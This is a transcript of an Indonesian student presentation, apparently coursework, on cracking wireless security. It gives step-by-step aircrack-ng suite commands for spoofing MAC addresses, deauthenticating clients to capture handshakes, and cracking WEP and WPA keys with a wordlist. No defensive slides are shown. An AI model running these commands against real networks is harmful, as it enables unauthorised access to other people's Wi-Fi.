Presentasi sedang didownload. Silahkan tunggu

Presentasi sedang didownload. Silahkan tunggu

Cracking MAC, WEP & WPA. Kelompok 10 1.Yopi Danis Irawan (07523189) 2. Budi Purnomo S (07523291) 3. Nurirwan Saputra (07523322) 4. Willy Wize Ananda(07523349)

Presentasi serupa


Presentasi berjudul: "Cracking MAC, WEP & WPA. Kelompok 10 1.Yopi Danis Irawan (07523189) 2. Budi Purnomo S (07523291) 3. Nurirwan Saputra (07523322) 4. Willy Wize Ananda(07523349)"— Transcript presentasi:

1 Cracking MAC, WEP & WPA

2 Kelompok 10 1.Yopi Danis Irawan (07523189) 2. Budi Purnomo S (07523291) 3. Nurirwan Saputra (07523322) 4. Willy Wize Ananda(07523349)

3 Sedikit penjelasan…. MAC Filtering WEP WPA

4 Perangkat yang digunakan Backtrack 4 : salah satu distro linux (Download: http://www.remote-exploit.org ) Airmon-ng : detect, manage wireless card Airodump-ng : scanning wireless card Aireplay-ng : arp request, flooding Aircrack-ng : decrypt key

5 Tujuan yang diharapkan 1.Melakukan manipulasi MAC Filtering 2.Cracking WEP key 3.Cracking WPA 4.Penanganan keamanan

6 Langkah Kerja 1 Manipulasi Mac filtering 1. Wireless Device identifikasi  Airmon-ng 2. Menonaktifkan interface wireless card  Airmon-ng stop [interfece] 3. Mengganti mac address  macchanger --mac 11:22:33:44:55:66 [device] 4. Melihat mac address yang sudah terganti  if config -a

7 Let’s do it Tutorial bisa dilihat di http://thew0rd.com/2008/08/19/tutorial-cracking- wep-using-backtrack-3/ http://thew0rd.com/2008/08/19/tutorial-cracking- wep-using-backtrack-3/ kita juga dapat menggunakan aplikasi bernama k-mac untuk memanipulasi mac www.neset.com

8 Cracking WEP key Aktifkan mode monitor  Airmon-ng start [device] Jalankan Airodump-ng (scanning wireless card)  airodump-ng --channel X --write nama_file_capture interface Jalankan aireplay (arp request, flooding)  aireplay-ng --deauth X –a BSSID_akses_point -c Mac Address target interface Jalankan aircrack-ng (decrypt key)  $ aircrack-ng nama_file_capture.cap

9 Let's crack it! Tutorial bisa dilihat di http://thew0rd.com/2008/08/19/tutorial- cracking-wep-using-backtrack-3/

10 Cracking WPA key 1.Wireless Device identifikasi #airmon-ng 2.Hidupkan Mode Monitor #airmon-ng stop [interface] (menghapus modus monitor) #airmon-ng start [interface] (mulai mode monitor) 3.Siapa yang online? #airodump-ng -w nama_file [interface] 4.Pilih musuh # airodump-ng --channel X --write nama_file_capture [interface] 5.Menunggu Handshake! # aireplay-ng -0 1-a [Ap_Mac]-c [Mac_Client] [interface] 6.Crack kuncinya! # aircrack-ng -0 –x 2 - w Kamus File FILE.cap


Download ppt "Cracking MAC, WEP & WPA. Kelompok 10 1.Yopi Danis Irawan (07523189) 2. Budi Purnomo S (07523291) 3. Nurirwan Saputra (07523322) 4. Willy Wize Ananda(07523349)"

Presentasi serupa


Iklan oleh Google